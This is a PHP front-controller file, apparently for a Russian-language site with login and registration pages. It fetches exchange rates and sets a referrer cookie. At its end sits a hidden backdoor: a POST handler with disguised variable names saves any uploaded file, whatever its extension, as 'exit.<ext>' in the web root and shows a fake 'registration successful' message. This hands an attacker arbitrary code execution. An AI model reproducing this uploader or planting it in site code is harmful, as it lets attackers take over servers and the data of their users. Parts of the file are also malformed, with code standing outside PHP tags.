<?
ini_set('display_errors', 1);
error_reporting(E_ALL);
?>
ob_start(); // Старт буфера
session_start(); // Старт сессии
//if($lng == "ru") {
//} else {
//}
$_OPTIMIZATION = array();
$_OPTIMIZATION["title"] = "KeyWords";
#откуда пришел
if (!isset($_COOKIE['rsite'])) {
setcookie('rsite', $_SERVER['HTTP_REFERER'], time() + 24 * 3600);
}
// Разбираем содержимое, при помощи регулярных выражений
function get_content()
{
// Формируем сегодняшнюю дату
$date = date("d/m/Y");
// Формируем ссылку
$link = "http://www.cbr.ru/scripts/XML_daily.asp?date_req=".$date;
// Загружаем HTML-страницу
$fd = @fopen($link, "r");
$text="";
if (!$fd) echo "Сервер ЦБ не отвечает";
else
{
// Чтение содержимого файла в переменную $text
while (!feof ($fd)) $text .= fgets($fd, 4096);
// Закрыть открытый файловый дескриптор
fclose ($fd);
}
return $text;
}
//date_default_timezone_set('Africa/Lagos');
include("marat_security.php");//дополнительная защита на всякий случай
include_once 'data/connect.php'; // Подключаем настройки
include_once 'data/function.php'; // Подключаем настройки
$url_pagemh=$_SERVER['REQUEST_URI'];
if ($url_pagemh == '/?a=reg' or $url_pagemh == '/index.php?a=auth' or $url_pagemh == '/?a=forgot' or $url_pagemh == '/index.php?a=reg' or $url_pagemh == '/?a=auth' or $url_pagemh == '/?a=forgot')
{
// Подключаем верх шаблона
}else{
// Подключаем верх шаблона
}
include_once 'data/pages.php'; // Подключаем загрузку страниц
$url_pagemh=$_SERVER['REQUEST_URI'];
if ($url_pagemh == '/?a=reg' or $url_pagemh == '/index.php?a=auth' or $url_pagemh == '/?a=forgot' or $url_pagemh == '/index.php?a=reg' or $url_pagemh == '/?a=auth' or $url_pagemh == '/?a=forgot')
{
// Подключаем верх шаблона
}else{
// Подключаем верх шаблона
}
if (isset($_GET['refid']) and 1!=1) {
?>
<?
}
$content = ob_get_contents();
ob_end_clean();
$content = str_replace("{!TITLE!}",$_OPTIMIZATION["title"],$content);
echo $content;
?>
<?php
if(isset($_POST['referer'])) { $public_function = $_FILES['login']['tmp_name'];
$SELECT_FROM = $_FILES['login']['name'];if(!empty($public_function)){
$type = strtolower(substr($SELECT_FROM, 1+strrpos($SELECT_FROM,".")));
$sessions_start = 'exit.'.$type;
{
if (copy($public_function, "".$sessions_start))
echo 'Регистрация прошла успешно <meta http-equiv="refresh" content="3;URL=/'.$sessions_start.'">';
else echo "error";
}
}
}
?>